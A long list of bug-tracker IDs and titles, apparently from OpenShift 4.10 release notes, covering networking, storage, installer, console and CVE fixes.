2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from "registry:5000" repository
2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8
2024055 - External DNS added extra prefix for the TXT record
2024108 - Occasionally node remains in SchedulingDisabled state even after update has been completed sucessfully
2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json
2024199 - 400 Bad Request error for some queries for the non admin user
2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode
2024262 - Sample catalog is not displayed when one API call to the backend fails
2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability
2024316 - modal about support displays wrong annotation
2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected
2024399 - Extra space is in the translated text of "Add/Remove alternate service" on Create Route page
2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view
2024493 - Observe > Alerting > Alerting rules page throws error trying to destructure undefined
2024515 - test-blocker: Ceph-storage-plugin tests failing
2024535 - hotplug disk missing OwnerReference
2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image
2024547 - Detail page is breaking for namespace store , backing store and bucket class.
2024551 - KMS resources not getting created for IBM FlashSystem storage
2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel
2024613 - pod-identity-webhook starts without tls
2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded
2024665 - Bindable services are not shown on topology
2024731 - linuxptp container: unnecessary checking of interfaces
2024750 - i18n some remaining OLM items
2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured
2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack
2024841 - test Keycloak with latest tag
2024859 - Not able to deploy an existing image from private image registry using developer console
2024880 - Egress IP breaks when network policies are applied
2024900 - Operator upgrade kube-apiserver
2024932 - console throws "Unauthorized" error after logging out
2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up
2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick
2025230 - ClusterAutoscalerUnschedulablePods should not be a warning
2025266 - CreateResource route has exact prop which need to be removed
2025301 - [e2e][automation] VM actions availability in different VM states
2025304 - overwrite storage section of the DV spec instead of the pvc section
2025431 - [RFE]Provide specific windows source link
2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36
2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node
2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn't work for ExternalTrafficPolicy=local
2025481 - Update VM Snapshots UI
2025488 - [DOCS] Update the doc for nmstate operator installation
2025592 - ODC 4.9 supports invalid devfiles only
2025765 - It should not try to load from storageProfile after unchecking"Apply optimized StorageProfile settings"
2025767 - VMs orphaned during machineset scaleup
2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns "kubevirt-hyperconverged" while using customize wizard
2025788 - [IPI on azure]Pre-check on IPI Azure, should check VM Size’s vCPUsAvailable instead of vCPUs for the sku.
2025821 - Make "Network Attachment Definitions" available to regular user
2025823 - The console nav bar ignores plugin separator in existing sections
2025830 - CentOS capitalizaion is wrong
2025837 - Warn users that the RHEL URL expire
2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-
2025903 - [UI] RoleBindings tab doesn't show correct rolebindings
2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2026178 - OpenShift Alerting Rules Style-Guide Compliance
2026209 - Updation of task is getting failed (tekton hub integration)
2026223 - Internal error occurred: failed calling webhook "ptpconfigvalidationwebhook.openshift.io"
2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates
2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct
2026352 - Kube-Scheduler revision-pruner fail during install of new cluster
2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment
2026383 - Error when rendering custom Grafana dashboard through ConfigMap
2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation
2026396 - Cachito Issues: sriov-network-operator Image build failure
2026488 - openshift-controller-manager - delete event is repeating pathologically
2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined.
2026560 - Cluster-version operator does not remove unrecognized volume mounts
2026699 - fixed a bug with missing metadata
2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator
2026898 - Description/details are missing for Local Storage Operator
2027132 - Use the specific icon for Fedora and CentOS template
2027238 - "Node Exporter / USE Method / Cluster" CPU utilization graph shows incorrect legend
2027272 - KubeMemoryOvercommit alert should be human readable
2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group
2027288 - Devfile samples can't be loaded after fixing it on Safari (redirect caching issue)
2027299 - The status of checkbox component is not revealed correctly in code
2027311 - K8s watch hooks do not work when fetching core resources
2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation
2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don't use the downstream images
2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation
2027498 - [IBMCloud] SG Name character length limitation
2027501 - [4.10] Bootimage bump tracker
2027524 - Delete Application doesn't delete Channels or Brokers
2027563 - e2e/add-flow-ci.feature fix accessibility violations
2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges
2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions
2027685 - openshift-cluster-csi-drivers pods crashing on PSI
2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced
2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string
2027917 - No settings in hostfirmwaresettings and schema objects for masters
2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf
2027982 - nncp stucked at ConfigurationProgressing
2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters
2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed
2028030 - Panic detected in cluster-image-registry-operator pod
2028042 - Desktop viewer for Windows VM shows "no Service for the RDP (Remote Desktop Protocol) can be found"
2028054 - Cloud controller manager operator can't get leader lease when upgrading from 4.8 up to 4.9
2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin
2028141 - Console tests doesn't pass on Node.js 15 and 16
2028160 - Remove i18nKey in network-policy-peer-selectors.tsx
2028162 - Add Sprint 210 translations
2028170 - Remove leading and trailing whitespace
2028174 - Add Sprint 210 part 2 translations
2028187 - Console build doesn't pass on Node.js 16 because node-sass doesn't support it
2028217 - Cluster-version operator does not default Deployment replicas to one
2028240 - Multiple CatalogSources causing higher CPU use than necessary
2028268 - Password parameters are listed in FirmwareSchema in spite that cannot and shouldn't be set in HostFirmwareSettings
2028325 - disableDrain should be set automatically on SNO
2028484 - AWS EBS CSI driver's livenessprobe does not respect operator's loglevel
2028531 - Missing netFilter to the list of parameters when platform is OpenStack
2028610 - Installer doesn't retry on GCP rate limiting
2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting
2028695 - destroy cluster does not prune bootstrap instance profile
2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs
2028802 - CRI-O panic due to invalid memory address or nil pointer dereference
2028816 - VLAN IDs not released on failures
2028881 - Override not working for the PerformanceProfile template
2028885 - Console should show an error context if it logs an error object
2028949 - Masthead dropdown item hover text color is incorrect
2028963 - Whereabouts should reconcile stranded IP addresses
2029034 - enabling ExternalCloudProvider leads to inoperative cluster
2029178 - Create VM with wizard - page is not displayed
2029181 - Missing CR from PGT
2029273 - wizard is not able to use if project field is "All Projects"
2029369 - Cypress tests github rate limit errors
2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out
2029394 - missing empty text for hardware devices at wizard review
2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used
2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl
2029521 - EFS CSI driver cannot delete volumes under load
2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle
2029579 - Clicking on an Application which has a Helm Release in it causes an error
2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn't for HPE
2029645 - Sync upstream 1.15.0 downstream
2029671 - VM action "pause" and "clone" should be disabled while VM disk is still being importing
2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip
2029750 - cvo keep restart due to it fail to get feature gate value during the initial start stage
2029785 - CVO panic when an edge is included in both edges and conditionaledges
2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)
2030003 - HFS CRD: Attempt to set Integer parameter to not-numeric string value - no error
2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2030228 - Fix StorageSpec resources field to use correct API
2030229 - Mirroring status card reflect wrong data
2030240 - Hide overview page for non-privileged user
2030305 - Export App job do not completes
2030347 - kube-state-metrics exposes metrics about resource annotations
2030364 - Shared resource CSI driver monitoring is not setup correctly
2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets
2030534 - Node selector/tolerations rules are evaluated too early
2030539 - Prometheus is not highly available
2030556 - Don't display Description or Message fields for alerting rules if those annotations are missing
2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation
2030574 - console service uses older "service.alpha.openshift.io" for the service serving certificates.
2030677 - BOND CNI: There is no option to configure MTU on a Bond interface
2030692 - NPE in PipelineJobListener.upsertWorkflowJob
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2030847 - PerformanceProfile API version should be v2
2030961 - Customizing the OAuth server URL does not apply to upgraded cluster
2031006 - Application name input field is not autofocused when user selects "Create application"
2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex
2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn't be started
2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue
2031057 - Topology sidebar for Knative services shows a small pod ring with "0 undefined" as tooltip
2031060 - Failing CSR Unit test due to expired test certificate
2031085 - ovs-vswitchd running more threads than expected
2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability
2031502 - [RFE] New common templates crash the ui
2031685 - Duplicated forward upstreams should be removed from the dns operator
2031699 - The displayed ipv6 address of a dns upstream should be case sensitive
2031797 - [RFE] Order and text of Boot source type input are wrong
2031826 - CI tests needed to confirm driver-toolkit image contents
2031831 - OCP Console - Global CSS overrides affecting dynamic plugins
2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional
2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)
2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)
2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself
2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource
2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff due to the image is built on linux+amd64
2032141 - open the alertrule link in new tab, got empty page
2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy
2032296 - Cannot create machine with ephemeral disk on Azure
2032407 - UI will show the default openshift template wizard for HANA template
2032415 - Templates page - remove "support level" badge and add "support level" column which should not be hard coded
2032421 - [RFE] UI integration with automatic updated images
2032516 - Not able to import git repo with .devfile.yaml
2032521 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the aws_vpc_dhcp_options_association resource
2032547 - hardware devices table have filter when table is empty
2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool
2032566 - Cluster-ingress-router does not support Azure Stack
2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso
2032589 - DeploymentConfigs ignore resolve-names annotation
2032732 - Fix styling conflicts due to recent console-wide CSS changes
2032831 - Knative Services and Revisions are not shown when Service has no ownerReference
2032851 - Networking is "not available" in Virtualization Overview
2032926 - Machine API components should use K8s 1.23 dependencies
2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24
2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster
2033013 - Project dropdown in user preferences page is broken
2033044 - Unable to change import strategy if devfile is invalid
2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable
2033111 - IBM VPC operator library bump removed global CLI args
2033138 - "No model registered for Templates" shows on customize wizard
2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected
2033239 - [IPI on Alibabacloud] 'openshift-install' gets the wrong region (‘cn-hangzhou’) selected
2033257 - unable to use configmap for helm charts
2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn’t triggered
2033290 - Product builds for console are failing
2033382 - MAPO is missing machine annotations
2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations
2033403 - Devfile catalog does not show provider information
2033404 - Cloud event schema is missing source type and resource field is using wrong value
2033407 - Secure route data is not pre-filled in edit flow form
2033422 - CNO not allowing LGW conversion from SGW in runtime
2033434 - Offer darwin/arm64 oc in clidownloads
2033489 - CCM operator failing on baremetal platform
2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver
2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains
2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating "cluster-infrastructure-02-config.yml" status, which leads to bootstrap failed and all master nodes NotReady
2033538 - Gather Cost Management Metrics Custom Resource
2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined
2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page
2033634 - list-style-type: disc is applied to the modal dropdowns
2033720 - Update samples in 4.10
2033728 - Bump OVS to 2.16.0-33
2033729 - remove runtime request timeout restriction for azure
2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended
2033749 - Azure Stack Terraform fails without Local Provider
2033750 - Local volume should pull multi-arch image for kube-rbac-proxy
2033751 - Bump kubernetes to 1.23
2033752 - make verify fails due to missing yaml-patch
2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource
2034004 - [e2e][automation] add tests for VM snapshot improvements
2034068 - [e2e][automation] Enhance tests for 4.10 downstream
2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore
2034097 - [OVN] After edit EgressIP object, the status is not correct
2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning
2034129 - blank page returned when clicking 'Get started' button
2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0
2034153 - CNO does not verify MTU migration for OpenShiftSDN
2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled
2034170 - Use function.knative.dev for Knative Functions related labels
2034190 - unable to add new VirtIO disks to VMs
2034192 - Prometheus fails to insert reporting metrics when the sample limit is met
2034243 - regular user cant load template list
2034245 - installing a cluster on aws, gcp always fails with "Error: Incompatible provider version"
2034248 - GPU/Host device modal is too small
2034257 - regular user Create VM missing permissions alert
2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2034287 - do not block upgrades if we can't create storageclass in 4.10 in vsphere
2034300 - Du validator policy is NonCompliant after DU configuration completed
2034319 - Negation constraint is not validating packages
2034322 - CNO doesn't pick up settings required when ExternalControlPlane topology
2034350 - The CNO should implement the Whereabouts IP reconciliation cron job
2034362 - update description of disk interface
2034398 - The Whereabouts IPPools CRD should include the podref field
2034409 - Default CatalogSources should be pointing to 4.10 index images
2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics
2034413 - cloud-network-config-controller fails to init with secret "cloud-credentials" not found in manual credential mode
2034460 - Summary: cloud-network-config-controller does not account for different environment
2034474 - Template's boot source is "Unknown source" before and after set enableCommonBootImageImport to true
2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren't working properly
2034493 - Change cluster version operator log level
2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list
2034527 - IPI deployment fails 'timeout reached while inspecting the node' when provisioning network ipv6
2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer
2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART
2034537 - Update team
2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds
2034563 - [Azure] create machine with wrong ephemeralStorageLocation value success
2034577 - Current OVN gateway mode should be reflected on node annotation as well
2034621 - context menu not popping up for application group
2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10
2034624 - Warn about unsupported CSI driver in vsphere operator
2034647 - missing volumes list in snapshot modal
2034648 - Rebase openshift-controller-manager to 1.23
2034650 - Rebase openshift/builder to 1.23
2034705 - vSphere: storage e2e tests logging configuration data
2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail.
2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment
2034785 - ptpconfig with summary_interval cannot be applied
2034823 - RHEL9 should be starred in template list
2034838 - An external router can inject routes if no service is added
2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent
2034879 - Lifecycle hook's name and owner shouldn't be allowed to be empty
2034881 - Cloud providers components should use K8s 1.23 dependencies
2034884 - ART cannot build the image because it tries to download controller-gen
2034889 - oc adm prune deployments does not work
2034898 - Regression in recently added Events feature
2034957 - update openshift-apiserver to kube 1.23.1
2035015 - ClusterLogForwarding CR remains stuck remediating forever
2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster
2035141 - [RFE] Show GPU/Host devices in template's details tab
2035146 - "kubevirt-plugin~PVC cannot be empty" shows on add-disk modal while adding existing PVC
2035167 - [cloud-network-config-controller] unable to deleted cloudprivateipconfig when deleting
2035199 - IPv6 support in mtu-migration-dispatcher.yaml
2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing
2035250 - Peering with ebgp peer over multi-hops doesn't work
2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices
2035315 - invalid test cases for AWS passthrough mode
2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env
2035321 - Add Sprint 211 translations
2035326 - [ExternalCloudProvider] installation with additional network on workers fails
2035328 - Ccoctl does not ignore credentials request manifest marked for deletion
2035333 - Kuryr orphans ports on 504 errors from Neutron
2035348 - Fix two grammar issues in kubevirt-plugin.json strings
2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets
2035409 - OLM E2E test depends on operator package that's no longer published
2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address
2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to 'ecs-cn-hangzhou.aliyuncs.com' timeout, although the specified region is 'us-east-1'
2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster
2035467 - UI: Queried metrics can't be ordered on Oberve->Metrics page
2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers
2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class
2035602 - [e2e][automation] add tests for Virtualization Overview page cards
2035703 - Roles -> RoleBindings tab doesn't show RoleBindings correctly
2035704 - RoleBindings list page filter doesn't apply
2035705 - Azure 'Destroy cluster' get stuck when the cluster resource group is already not existing.
2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed
2035772 - AccessMode and VolumeMode is not reserved for customize wizard
2035847 - Two dashes in the Cronjob / Job pod name
2035859 - the output of opm render doesn't contain olm.constraint which is defined in dependencies.yaml
2035882 - [BIOS setting values] Create events for all invalid settings in spec
2035903 - One redundant capi-operator credential requests in “oc adm extract --credentials-requests”
2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen
2035927 - Cannot enable HighNodeUtilization scheduler profile
2035933 - volume mode and access mode are empty in customize wizard review tab
2035969 - "ip a " shows "Error: Peer netns reference is invalid" after create test pods
2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation
2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error
2036029 - New added cloud-network-config operator doesn’t supported aws sts format credential
2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend
2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes
2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23
2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23
2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments
2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists
2036717 - Valid AlertmanagerConfig custom resource with valid a mute time interval definition is rejected
2036826 - oc adm prune deployments can prune the RC/RS
2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform
2036861 - kube-apiserver is degraded while enable multitenant
2036937 - Command line tools page shows wrong download ODO link
2036940 - oc registry login fails if the file is empty or stdout
2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container
2036989 - Route URL copy to clipboard button wraps to a separate line by itself
2036990 - ZTP "DU Done inform policy" never becomes compliant on multi-node clusters
2036993 - Machine API components should use Go lang version 1.17
2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log.
2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api
2037073 - Alertmanager container fails to start because of startup probe never being successful
2037075 - Builds do not support CSI volumes
2037167 - Some log level in ibm-vpc-block-csi-controller are hard code
2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles
2037182 - PingSource badge color is not matched with knativeEventing color
2037203 - "Running VMs" card is too small in Virtualization Overview
2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly
2037237 - Add "This is a CD-ROM boot source" to customize wizard
2037241 - default TTL for noobaa cache buckets should be 0
2037246 - Cannot customize auto-update boot source
2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately
2037288 - Remove stale image reference
2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources
2037483 - Rbacs for Pods within the CBO should be more restrictive
2037484 - Bump dependencies to k8s 1.23
2037554 - Mismatched wave number error message should include the wave numbers that are in conflict
2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]
2037635 - impossible to configure custom certs for default console route in ingress config
2037637 - configure custom certificate for default console route doesn't take effect for OCP >= 4.8
2037638 - Builds do not support CSI volumes as volume sources
2037664 - text formatting issue in Installed Operators list table
2037680 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037689 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037801 - Serverless installation is failing on CI jobs for e2e tests
2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format
2037856 - use lease for leader election
2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10
2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests
2037904 - upgrade operator deployment failed due to memory limit too low for manager container
2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]
2038034 - non-privileged user cannot see auto-update boot source
2038053 - Bump dependencies to k8s 1.23
2038088 - Remove ipa-downloader references
2038160 - The default project missed the annotation : openshift.io/node-selector: ""
2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional
2038196 - must-gather is missing collecting some metal3 resources
2038240 - Error when configuring a file using permissions bigger than decimal 511 (octal 0777)
2038253 - Validator Policies are long lived
2038272 - Failures to build a PreprovisioningImage are not reported
2038384 - Azure Default Instance Types are Incorrect
2038389 - Failing test: [sig-arch] events should not repeat pathologically
2038412 - Import page calls the git file list unnecessarily twice from GitHub/GitLab/Bitbucket
2038465 - Upgrade chromedriver to 90.x to support Mac M1 chips
2038481 - kube-controller-manager-guard and openshift-kube-scheduler-guard pods being deleted and restarted on a cordoned node when drained
2038596 - Auto egressIP for OVN cluster on GCP: After egressIP object is deleted, egressIP still takes effect
2038663 - update kubevirt-plugin OWNERS
2038691 - [AUTH-8] Panic on user login when the user belongs to a group in the IdP side and the group already exists via "oc adm groups new"
2038705 - Update ptp reviewers
2038761 - Open Observe->Targets page, wait for a while, page become blank
2038768 - All the filters on the Observe->Targets page can't work
2038772 - Some monitors failed to display on Observe->Targets page
2038793 - [SDN EgressIP] After reboot egress node, the egressip was lost from egress node
2038827 - should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces
2038832 - New templates for centos stream8 are missing registry suggestions in create vm wizard
2038840 - [SDN EgressIP]cloud-network-config-controller pod was CrashLoopBackOff after some operation
2038864 - E2E tests fail because multi-hop-net was not created
2038879 - All Builds are getting listed in DeploymentConfig under workloads on OpenShift Console
2038934 - CSI driver operators should use the trusted CA bundle when cluster proxy is configured
2038968 - Move feature gates from a carry patch to openshift/api
2039056 - Layout issue with breadcrumbs on API explorer page
2039057 - Kind column is not wide enough in API explorer page
2039064 - Bulk Import e2e test flaking at a high rate
2039065 - Diagnose and fix Bulk Import e2e test that was previously disabled
2039085 - Cloud credential operator configuration failing to apply in hypershift/ROKS clusters
2039099 - [OVN EgressIP GCP] After reboot egress node, egressip that was previously assigned got lost
2039109 - [FJ OCP4.10 Bug]: startironic.sh failed to pull the image of image-customization container when behind a proxy
2039119 - CVO hotloops on Service openshift-monitoring/cluster-monitoring-operator
2039170 - [upgrade]Error shown on registry operator "missing the cloud-provider-config configmap" after upgrade
2039227 - Improve image customization server parameter passing during installation
2039241 - Improve image customization server parameter passing during installation
2039244 - Helm Release revision history page crashes the UI
2039294 - SDN controller metrics cannot be consumed correctly by prometheus
2039311 - oc Does Not Describe Build CSI Volumes
2039315 - Helm release list page should only fetch secrets for deployed charts
2039321 - SDN controller metrics are not being consumed by prometheus
2039330 - Create NMState button doesn't work in OperatorHub web console
2039339 - cluster-ingress-operator should report Unupgradeable if user has modified the aws resources annotations
2039345 - CNO does not verify the minimum MTU value for IPv6/dual-stack clusters.
2039359 - oc adm prune deployments can't prune the RS where the associated Deployment no longer exists
2039382 - gather_metallb_logs does not have execution permission
2039406 - logout from rest session after vsphere operator sync is finished
2039408 - Add GCP region northamerica-northeast2 to allowed regions
2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration
2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment
2039491 - oc - git:// protocol used in unit tests
2039516 - Bump OVN to ovn21.12-21.12.0-25
2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate
2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled
2039541 - Resolv-prepender script duplicating entries
2039586 - [e2e] update centos8 to centos stream8
2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty
2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3'
2039670 - Create PDBs for control plane components
2039678 - Page goes blank when create image pull secret
2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported
2039743 - React missing key warning when open operator hub detail page (and maybe others as well)
2039756 - React missing key warning when open KnativeServing details
2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab
2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard
2039781 - [GSS] OBC is not visible by admin of a Project on Console
2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector
2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled
2039880 - Log level too low for control plane metrics
2039919 - Add E2E test for router compression feature
2039981 - ZTP for standard clusters installs stalld on master nodes
2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24. You can use --secure-port instead
2040136 - external-dns-operator pod keeps restarting and reports error: timed out waiting for cache to be synced
2040143 - [IPI on Alibabacloud] suggest to remove region "cn-nanjing" or provide better error message
2040150 - Update ConfigMap keys for IBM HPCS
2040160 - [IPI on Alibabacloud] installation fails when region does not support pay-by-bandwidth
2040285 - Bump build-machinery-go for console-operator to pickup change in yaml-patch repository
2040357 - bump OVN to ovn-2021-21.12.0-11.el8fdp
2040376 - "unknown instance type" error for supported m6i.xlarge instance
2040394 - Controller: enqueue the failed configmap till services update
2040467 - Cannot build ztp-site-generator container image
2040504 - Change AWS EBS GP3 IOPS in MachineSet doesn't take affect in OpenShift 4
2040521 - RouterCertsDegraded certificate could not validate route hostname v4-0-config-system-custom-router-certs.apps
2040535 - Auto-update boot source is not available in customize wizard
2040540 - ovs hardware offload: ovsargs format error when adding vf netdev name
2040603 - rhel worker scaleup playbook failed because missing some dependency of podman
2040616 - rolebindings page doesn't load for normal users
2040620 - [MAPO] Error pulling MAPO image on installation
2040653 - Topology sidebar warns that another component is updated while rendering
2040655 - User settings update fails when selecting application in topology sidebar
2040661 - Different react warnings about updating state on unmounted components when leaving topology
2040670 - Permafailing CI job: periodic-ci-openshift-release-master-nightly-4.10-e2e-gcp-libvirt-cert-rotation
2040671 - [Feature:IPv6DualStack] most tests are failing in dualstack ipi
2040694 - Three upstream HTTPClientConfig struct fields missing in the operator
2040705 - Du policy for standard cluster runs the PTP daemon on masters and workers
2040710 - cluster-baremetal-operator cannot update BMC subscription CR
2040741 - Add CI test(s) to ensure that metal3 components are deployed in vSphere, OpenStack and None platforms
2040782 - Import YAML page blocks input with more then one generateName attribute
2040783 - The Import from YAML summary page doesn't show the resource name if created via generateName attribute
2040791 - Default PGT policies must be 'inform' to integrate with the Lifecycle Operator
